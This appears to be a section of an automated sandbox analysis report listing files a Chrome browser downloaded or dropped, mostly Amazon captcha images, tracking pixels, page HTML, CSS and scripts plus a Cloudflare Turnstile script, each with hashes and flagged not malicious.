                                                                                                                                  Preview:......JFIF.....H.H.....C.......................................................................F.........................................(...................................."!........?....s....r..c%....p.y%#..^.....r...O.............C:..]..{a.+..:.2.R.O.1W..\.@=6.......?..h........x.....A.._vC..........S..v..P.......c...X....8N..Q.4.~va.W.e.m.]...i.Ki.^;....7.Z.;..L.n;...Z..RP7....]0....7Q....X...... ....\..c..]:...j.Qr..n..u..{P.........$.aI#.....W..Y.R....r./<........?-.q.....Ej.7..?@...V...Tm.v*.>-[`..S......lv..$d.[om..].._r..;[.{._.Jam...Yb.N...2...p.vR.<.R...> ..N0..S+m...9...3...[i+q.P....^ZZe..Y...)-..|.kRP.eY.3..e.+.....7.].WI.Ai..T.i..1.u.j.h..V......1...lq.~..N..8......".{..u~./.{......6.....)...S.{.@..4?.'.|7.*Z..)#..{.t.jl...z..... \a.&Bv.k.W.j4.B~....&..#$#P...3.a..J0.`.30.../u..-.[kJ......tt.....[..\..mW......0....Hfk\O.h.T.....nY.p...;<M.Y...6.V..'L..;,....YAQv....0.,...6f6NL..)...@0..2.k.u.../........y%.4.O.W..}.".WY
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 200x70, components 1
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):5434
                                                                                                                                  Entropy (8bit):7.918908854626691
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:f4Vi2dpYTwVWCnjhV2PY3mW/Owds7pP6f+zlHqx0HPP40ZiHG4SCGW1XDY69OR:wVRYQWCmPY2Wzds7piwdqe4XHRSYc694
                                                                                                                                  MD5:7418ECA2F077DD65DE3E40404258EB53
                                                                                                                                  SHA1:43EF0831AAFB23DB800DA66EF71F70166B477C35
                                                                                                                                  SHA-256:CEBC431C1CE3962CCCFDCDC0DDFAAEA8CDFDA3A043A1BF622327AB986B8CA764
                                                                                                                                  SHA-512:61111901C4171D7D08CC2FDBE6B88034EB8785FF080EE17D95F01F78FD0B5CC2600D9F744E4C05826E602AACEDBF234C2D4E1B89162C5E68083E1FC7BF7783F1
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:......JFIF.....H.H.....C.......................................................................F..........................................,.................................!".#..$%1........?....s....r..c%....p.y%#..^.../.......?....^...9..l*&..._`\.....P....M.@.\....*L..p.2....yW..:.%....BS.=.S.t..t..Dv6..{.kD.j.......f.}....u...<[.3.H....t.F.0.(.$..J.~.0>...=)......<....T...Z..Z........s.....p..8.2...K^.C... ....-.o"....^.V......U...Y.R.ugP...Y.f.=z-t.1b)..L..G....01.-A...8..].s..w...N.1...V.v[5&..i.*.;........b...C5.$N.....$...k.k...w..v.._l...}l.hn.W..o]D.......~m.F2<)....B.....RK.E...H....U..O..X/..)'...%.~.~sE.i.>.)K.u;?.3#.]!...)...}.<...QI.....>..z...im....2.S..+B.n..bb.....AV.....)/.......{..Bd...c.*[.%.h'.j8..K.*Kc>.V.m.^...;....)....) .~-...>.Z....x.q^.vt|8.....p...=.Y...s5La...X...5...R..W.IC..........*D.k..w...E..........C$E.r$...2...2..e..d!.<....r...8....;.N..6.....qZ...L..BB.e.z[e.d.Y.1..w..f....8.G.p.Y}.d.4.....].....%.v>.
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:ASCII text, with very long lines (48120)
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):48121
                                                                                                                                  Entropy (8bit):5.399691943006684
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:1CbU/4ruPh5taq75KvO8fV9/KFek7z6yblJCTBsgVX2PwDBsjY1L8ep7K1oiSJvU:QruPh5taq7gGwV9yTWyb62PQsp
                                                                                                                                  MD5:7515EA4F181B76ACACFB90430C6DF9C3
                                                                                                                                  SHA1:49775B023CDA207D8A8AE14CAEDB65A8990F57F5
                                                                                                                                  SHA-256:B34ABD4710711ACE5B6C275118FFA7E1170C7D468BD95E3C859F9E76F767214B
                                                                                                                                  SHA-512:1F8AB306A169CC7C45851B350D632E1266BD45A9CC53DC29857731217314CA96AAD4395A6B9A04CC37ABFD1A3D13CAAF1D474E0623B294DDFD85E72C2D1102B9
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://challenges.cloudflare.com/turnstile/v0/b/725bd36e298b/api.js
                                                                                                                                  Preview:"use strict";(function(){function Bt(e,t,a,o,c,l,g){try{var h=e[l](g),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function g(s){Bt(l,o,c,g,h,"next",s)}function h(s){Bt(l,o,c,g,h,"throw",s)}g(void 0)})}}function D(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):D(e,t)}function Ue(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function De(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Ue(e,c,a[c])})}return e}function Sr(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):43
                                                                                                                                  Entropy (8bit):2.9889835948335506
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                  MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                  SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                  SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                  SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=Z2W5Q2NMT8ZFTHR536PX&js=1
                                                                                                                                  Preview:GIF89a.............!.......,...........L..;
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):43
                                                                                                                                  Entropy (8bit):2.9889835948335506
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                  MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                  SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                  SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                  SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:GIF89a.............!.......,...........L..;
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 200x70, components 1
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):6105
                                                                                                                                  Entropy (8bit):7.922084492450184
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:0oeK+7yhxe6BnWma42VtNQn/zon7CSLjL46cQph5ajm/m/AirlTC7Ds/vMGgJ13:ZeR7Qc8nWm7Ww/07CIlhAjmrg87zX13
                                                                                                                                  MD5:92D23ECBACD39E4AE6477900F9E96E56
                                                                                                                                  SHA1:B9627459CB2873497C8CDCB659DF7883855D64C3
                                                                                                                                  SHA-256:E3E64B16CC2DB83ACC21FBC54633BD6D0B612CE93457503224EFAD2336229524
                                                                                                                                  SHA-512:2C3E26AFCB0427FB6260E13A91BEA43FF414F6EA4C4B95D539442C6337D4AF4C3053B6A5655195C36A5E43C13C76032D02B989D1FEA04A1DAE52197841492DC5
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://images-na.ssl-images-amazon.com/captcha/docvmtpr/Captcha_zqhwgudfzb.jpg
                                                                                                                                  Preview:......JFIF.....H.H.....C.......................................................................F.........................................)..................................!."$1........?....<x....+.9......z.....y..].D....o.f.x.Z..".c.hx..&8.'.g?x.F:.....v..G.{+./..#..%.hI..8..N....Y."..^R.I'....Jr......?#....M...=/...9F..a...;].\j`.-dTt.Q.j.Z ...d`..U.n...C......+[.......{.7/b]+/^Gj.u...E8.nu..n......6..H......%.P"L..o7.i........'*...N..W*.Y......tya6..W....'-7...d...9.Jt|...ISR.K..7.x........8.oU.as.v...Dl...-w...F.;P.........-8,.BB....h..fJ..K....K..py.......i..YS.c..e..:r....#.J ..ISp..!.._.Q.g.....2..6..7^.n]..bk.l..<.q..Kf..P.=.-.....5.[>.....<s%..z.*,h3.Z..1...Q..c.....S..v[...+........Lb...J..%.M..~.3...r..~W;L&..V..qU...[R.$UCs.._*.......I9W..$.1.2.vYS......%.l....5.......L...."..+Vj.(f@......f....$....2.M.....u....g?....C.............\...b]..(.B....n+.=!..K"%...0....*..=..9.g.i...g..f.Y..#M&J=p..,.55.F.2.|q.M,E.....":_.5...R.u.3.......:...
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 200x70, components 1
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):5434
                                                                                                                                  Entropy (8bit):7.918908854626691
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:f4Vi2dpYTwVWCnjhV2PY3mW/Owds7pP6f+zlHqx0HPP40ZiHG4SCGW1XDY69OR:wVRYQWCmPY2Wzds7piwdqe4XHRSYc694
                                                                                                                                  MD5:7418ECA2F077DD65DE3E40404258EB53
                                                                                                                                  SHA1:43EF0831AAFB23DB800DA66EF71F70166B477C35
                                                                                                                                  SHA-256:CEBC431C1CE3962CCCFDCDC0DDFAAEA8CDFDA3A043A1BF622327AB986B8CA764
                                                                                                                                  SHA-512:61111901C4171D7D08CC2FDBE6B88034EB8785FF080EE17D95F01F78FD0B5CC2600D9F744E4C05826E602AACEDBF234C2D4E1B89162C5E68083E1FC7BF7783F1
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://images-na.ssl-images-amazon.com/captcha/uyvnnjxx/Captcha_lfxcionvuw.jpg
                                                                                                                                  Preview:......JFIF.....H.H.....C.......................................................................F..........................................,.................................!".#..$%1........?....s....r..c%....p.y%#..^.../.......?....^...9..l*&..._`\.....P....M.@.\....*L..p.2....yW..:.%....BS.=.S.t..t..Dv6..{.kD.j.......f.}....u...<[.3.H....t.F.0.(.$..J.~.0>...=)......<....T...Z..Z........s.....p..8.2...K^.C... ....-.o"....^.V......U...Y.R.ugP...Y.f.=z-t.1b)..L..G....01.-A...8..].s..w...N.1...V.v[5&..i.*.;........b...C5.$N.....$...k.k...w..v.._l...}l.hn.W..o]D.......~m.F2<)....B.....RK.E...H....U..O..X/..)'...%.~.~sE.i.>.)K.u;?.3#.]!...)...}.<...QI.....>..z...im....2.S..+B.n..bb.....AV.....)/.......{..Bd...c.*[.%.h'.j8..K.*Kc>.V.m.^...;....)....) .~-...>.Z....x.q^.vt|8.....p...=.Y...s5La...X...5...R..W.IC..........*D.k..w...E..........C$E.r$...2...2..e..d!.<....r...8....;.N..6.....qZ...L..BB.e.z[e.d.Y.1..w..f....8.G.p.Y}.d.4.....].....%.v>.
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):6591
                                                                                                                                  Entropy (8bit):4.507205616421364
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:lIiNmvtGtfstQJdAcVur6MQQQTtKr1ecMfPulP6tjI:ODoecaQQQTtKr1ecMucjI
                                                                                                                                  MD5:6979C8E5BC4A55C4CA95349747B7F64E
                                                                                                                                  SHA1:E00DF8E8A13E11D8E897FF0DDFA134C672AC813B
                                                                                                                                  SHA-256:B4AA356E62256033EDB6779517200784C5152B92D1AEC3E41D481E59A32E389A
                                                                                                                                  SHA-512:2D8163BE9647653A3A6EF7D16F0AA0D591933A5A0F7A06D81C78CD85B247E530B35AF86A52F8B5113A21A35278FC0C312CB1E6F6E4CEAF2B1B26C1B97C396E2D
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://www.amazon.com/errors/validateCaptcha?amzn=aWtjLQPQePOkOjbZRBDfnw%3D%3D&amzn-r=%2F&field-keywords=
                                                                                                                                  Preview:<!DOCTYPE html>. [if lt IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8 a-lt-ie7"> <![endif]-->. [if IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8"> <![endif]-->. [if IE 8]> <html lang="en-us" class="a-no-js a-lt-ie9"> <![endif]-->. [if gt IE 8]> >.<html class="a-no-js" lang="en-us"> <![endif]--><head>.<meta http-equiv="content-type" content="text/html; charset=UTF-8">.<meta charset="utf-8">.<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">.<title dir="ltr">Amazon.com</title>.<meta name="viewport" content="width=device-width">.<link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/AmazonUI-3c913031596ca78a3768f4e934b1cc02ce238101.secure.min._V1_.css">.<script>..if (true === true) {. var ue_t0 = (+ new Date()),. ue_csm = window,. ue = { t0: ue_t0, d: function() { return (+new Date() - ue_t0); } },. ue_furl = "fls-na.amazon.com",. ue_mid = "ATVPDKIKX0DER",.
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):168705
                                                                                                                                  Entropy (8bit):5.052671428628102
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:hnH9/mTR/TwK/w1/6kvF/hHJ/Etz/cT9/JgG/cGzLQtS3HPRmup1SsYCGqgLfNJw:lLQtS3Jmup1KOJzUs10gSGH/m9Eg6J
                                                                                                                                  MD5:7129F677DA939F3180941A6ED120101E
                                                                                                                                  SHA1:3C913031596CA78A3768F4E934B1CC02CE238101
                                                                                                                                  SHA-256:5AB7636E9F2E3AD10ACC3D81E7EF8BF615504699D42034C041FF9E7C93F178BB
                                                                                                                                  SHA-512:8CA9EC36A28AEBC3F70ED44EE49633DE7FF72600BD3E0CA9677015CAE059843B4E1CA53ADA897158A4F36EB9E445B2C1E593836745A5990139F1C5FE577AD05D
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/AmazonUI-3c913031596ca78a3768f4e934b1cc02ce238101.secure.min._V1_.css
                                                                                                                                  Preview:.clearfix{*zoom:1}.clearfix:before,.clearfix:after{display:table;content:"";line-height:0;font-size:0}.clearfix:after{clear:both}.hide-text{font:0/0 a;color:transparent;text-shadow:none;background-color:transparent;border:0}.offscreen{position:absolute;left:-10000px;top:auto;width:1px;height:1px;overflow:hidden}.a-hidden{display:none!important;visibility:hidden!important}.a-visible-phone{display:none!important}.a-visible-tablet{display:none!important}.a-hidden-desktop{display:none!important}@media(max-width:767px){.a-visible-phone{display:inherit!important}.a-hidden-phone{display:none!important}.a-hidden-desktop{display:inherit!important}.a-visible-desktop{display:none!important}}@media(min-width:768px) and (max-width:979px){.a-visible-tablet{display:inherit!important}.a-hidden-tablet{display:none!important}.a-hidden-desktop{display:inherit!important}.a-visible-desktop{display:none!important}}*{-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}article,aside
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):43
                                                                                                                                  Entropy (8bit):2.9889835948335506
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                  MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                  SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                  SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                  SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:GIF89a.............!.......,...........L..;
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 200x70, components 1
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):6105
                                                                                                                                  Entropy (8bit):7.922084492450184
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:0oeK+7yhxe6BnWma42VtNQn/zon7CSLjL46cQph5ajm/m/AirlTC7Ds/vMGgJ13:ZeR7Qc8nWm7Ww/07CIlhAjmrg87zX13
                                                                                                                                  MD5:92D23ECBACD39E4AE6477900F9E96E56
                                                                                                                                  SHA1:B9627459CB2873497C8CDCB659DF7883855D64C3
                                                                                                                                  SHA-256:E3E64B16CC2DB83ACC21FBC54633BD6D0B612CE93457503224EFAD2336229524
                                                                                                                                  SHA-512:2C3E26AFCB0427FB6260E13A91BEA43FF414F6EA4C4B95D539442C6337D4AF4C3053B6A5655195C36A5E43C13C76032D02B989D1FEA04A1DAE52197841492DC5
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:......JFIF.....H.H.....C.......................................................................F.........................................)..................................!."$1........?....<x....+.9......z.....y..].D....o.f.x.Z..".c.hx..&8.'.g?x.F:.....v..G.{+./..#..%.hI..8..N....Y."..^R.I'....Jr......?#....M...=/...9F..a...;].\j`.-dTt.Q.j.Z ...d`..U.n...C......+[.......{.7/b]+/^Gj.u...E8.nu..n......6..H......%.P"L..o7.i........'*...N..W*.Y......tya6..W....'-7...d...9.Jt|...ISR.K..7.x........8.oU.as.v...Dl...-w...F.;P.........-8,.BB....h..fJ..K....K..py.......i..YS.c..e..:r....#.J ..ISp..!.._.Q.g.....2..6..7^.n]..bk.l..<.q..Kf..P.=.-.....5.[>.....<s%..z.*,h3.Z..1...Q..c.....S..v[...+........Lb...J..%.M..~.3...r..~W;L&..V..qU...[R.$UCs.._*.......I9W..$.1.2.vYS......%.l....5.......L...."..+Vj.(f@......f....$....2.M.....u....g?....C.............\...b]..(.B....n+.=!..K"%...0....*..=..9.g.i...g..f.Y..#M&J=p..,.55.F.2.|q.M,E.....":_.5...R.u.3.......:...
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:MS Windows icon resource - 4 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):17542
                                                                                                                                  Entropy (8bit):2.247918084411713
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:9dLhJ6/f2dh+xQLeZ10TLwhwOHae6nmErcglsIZS3F:3jaOdhQQu0TLwaOHEr6IZ
                                                                                                                                  MD5:CA6619B86C2F6E6068B69BA3AADDB7E4
                                                                                                                                  SHA1:C44A1BB9D14385334EB851FBB0AFB19D961C1EE7
                                                                                                                                  SHA-256:17D02E2DB6DBEDB95DD449D06868C147AC2C3B5371497BCB9407E75336A99E09
                                                                                                                                  SHA-512:30F8F8618BFBCD57925411E6860A10B6AD9A60F2A6B08D35C870EA3F4CEC4692596A937FF1457CEFF5847D5DA2B86CEBA0200706625E28C56A2455E6A8C121D3
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:......00.... ..%..F... .... ......%........ ......6........ .h....@..(...0...`..... ......%.........................................E...................................................................................................................................................?...................................$...........................................................................................................................................................................................B............................................................................r...P..........................................................................................9...............-........................................................r...................................................>......................................................................$..............................................................................................................................
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):6591
                                                                                                                                  Entropy (8bit):4.511390864247244
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:lI1mvtGtfstQJdA8VIr6MQQQTtKrme/MfPulP6tjI:O4oe8wQQQTtKrme/MucjI
                                                                                                                                  MD5:CA0A91952F6D7FD7E04C2F83B44A9911
                                                                                                                                  SHA1:F710891B88F02A882B3E7C8DAE7D3212743B1B60
                                                                                                                                  SHA-256:099631BB60CE667F94EB1CB946E0A34CEB73E8F0F185583F481375C63AE82CEF
                                                                                                                                  SHA-512:F8E66C48BE8F2B9B018BDFE6DC9D1F8B848A8FF5D38A7299D55E1654599E8F37550639C4A026C368C1E26025099E12D439CAE1B8F6F2CF22A5F5468A43243D7D
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://www.amazon.com/
                                                                                                                                  Preview:<!DOCTYPE html>. [if lt IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8 a-lt-ie7"> <![endif]-->. [if IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8"> <![endif]-->. [if IE 8]> <html lang="en-us" class="a-no-js a-lt-ie9"> <![endif]-->. [if gt IE 8]> >.<html class="a-no-js" lang="en-us"> <![endif]--><head>.<meta http-equiv="content-type" content="text/html; charset=UTF-8">.<meta charset="utf-8">.<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">.<title dir="ltr">Amazon.com</title>.<meta name="viewport" content="width=device-width">.<link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/AmazonUI-3c913031596ca78a3768f4e934b1cc02ce238101.secure.min._V1_.css">.<script>..if (true === true) {. var ue_t0 = (+ new Date()),. ue_csm = window,. ue = { t0: ue_t0, d: function() { return (+new Date() - ue_t0); } },. ue_furl = "fls-na.amazon.com",. ue_mid = "ATVPDKIKX0DER",.
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):43
                                                                                                                                  Entropy (8bit):2.9889835948335506
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                  MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                  SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                  SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                  SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:GIF89a.............!.......,...........L..;
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:ASCII text, with very long lines (7210), with no line terminators
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):7210
                                                                                                                                  Entropy (8bit):5.342079982931804
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:wSzRpODZ2cOVzU+onhfDPUtI7D5wfxBkChhUSXCzrK5Xo2TZmfWwBNUr1jvNx5Pp:J1pjc4QJnhbctI7D5wfxBkChhUSXCzrs
                                                                                                                                  MD5:1C399AD9886CAB69575E1E5EE15C61A1
                                                                                                                                  SHA1:5B4A4FAE777B5A20A6751361F0C64B9D590E37BA
                                                                                                                                  SHA-256:A538A2B295512C2A3B74F63E74047DB79140733DA941FB0FCA2B95A1DFDADA37
                                                                                                                                  SHA-512:14520A8D7AC1C28FA58F4D9392CCB7C720C50967062ED8CA1D47BDA93089C2C4F375689F8A3E71923098938BE8C2851396020D9D3976FFE101507125A02BFF51
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://images-na.ssl-images-amazon.com/images/G/01/csminstrumentation/ue-base-1c399ad9886cab69575e1e5ee15c61a1._V313498596_.js
                                                                                                                                  Preview:(function(c,d){c.ue=c.ue||{};function b(h,j,i){var g="; expires="+new Date(+new Date+i).toGMTString();d.cookie=h+"="+j+g+"; path=/"}function a(g){if(d.cookie&&d.cookie.split){var l=document.cookie.split(";"),j,m,k=new RegExp("^\\s*"+g+"=");for(var h=0;h<l.length;h++){j=l[h];if(k.test(j)){m=j.split("=");if(m&&m.length==2){return m[1]}}}}return null}function f(g){b(g,"",-1)}var e={set:b,get:a,del:f};c.ue.ch=e})(ue_csm,document);(function(c){var m=c.ue||{},j="csm-sid",h="0123456789",i="0123456789ABCDEFGHIJKLMNOPQRSTUVXYZ";function e(o){var p=/^\d{3}-\d{7}-\d{7}$/;return p.test(o)}function n(o){var p=Math.floor(Math.random()*o.length);return o.charAt(p)}function d(r,q){var o="";for(var p=0;p<q;p++){o=o+n(r)}return o}function g(){return d(i,20)}function k(){var o=d(h,18);return o.substring(0,3)+"-"+o.substring(4,11)+"-"+o.substring(11,18)}function b(){if(c.ue&&c.ue.ch){var o=c.ue.ch.get(j);if(e(o)){return o}}return 0}function l(o){if(!e(o)){return 0}if(c.ue&&c.ue.ch){c.ue.ch.set(j,o,2366769
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):6591
                                                                                                                                  Entropy (8bit):4.512895055483239
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:lIsmvtGtfstQJdA2Vor6MQQQTtKrJe4MfPulP6tjI:OPoe2IQQQTtKrJe4MucjI
                                                                                                                                  MD5:10BD4E46FE174FD5A8F26D803C583541
                                                                                                                                  SHA1:79D2C9485EC8E998928852B16E149343A4AC0E3E
                                                                                                                                  SHA-256:E7818C2C8E7AEB696680CE7218F71654790D7B00492E83D8505400E56DF74E61
                                                                                                                                  SHA-512:600CECAFA6FEF2A198457EE25EE680E60263F47A4B4F3D5F0DD84297D457149D2EBFA14361FE3651F2743B4ACB2B78D6FE86345048D44AF371A31CEA7C7D3214
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  URL:https://www.amazon.com/errors/validateCaptcha?amzn=oOG14CFEo0qNm3ZfyheDnw%3D%3D&amzn-r=%2F&field-keywords=
                                                                                                                                  Preview:<!DOCTYPE html>. [if lt IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8 a-lt-ie7"> <![endif]-->. [if IE 7]> <html lang="en-us" class="a-no-js a-lt-ie9 a-lt-ie8"> <![endif]-->. [if IE 8]> <html lang="en-us" class="a-no-js a-lt-ie9"> <![endif]-->. [if gt IE 8]> >.<html class="a-no-js" lang="en-us"> <![endif]--><head>.<meta http-equiv="content-type" content="text/html; charset=UTF-8">.<meta charset="utf-8">.<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">.<title dir="ltr">Amazon.com</title>.<meta name="viewport" content="width=device-width">.<link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/AmazonUI-3c913031596ca78a3768f4e934b1cc02ce238101.secure.min._V1_.css">.<script>..if (true === true) {. var ue_t0 = (+ new Date()),. ue_csm = window,. ue = { t0: ue_t0, d: function() { return (+new Date() - ue_t0); } },. ue_furl = "fls-na.amazon.com",. ue_mid = "ATVPDKIKX0DER",.
                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  File Type:MS Windows icon resource - 4 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):17542
                                                                                                                                  Entropy (8bit):2.247918084411713
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:9dLhJ6/f2dh+xQLeZ10TLwhwOHae6nmErcglsIZS3F:3jaOdhQQu0TLwaOHEr6IZ
                                                                                                                                  MD5:CA6619B86C2F6E6068B69BA3AADDB7E4
                                                                                                                                  SHA1:C44A1BB9D14385334EB851FBB0AFB19D961C1EE7
                                                                                                                                  SHA-256:17D02E2DB6DBEDB95DD449D06868C147AC2C3B5371497BCB9407E75336A99E09
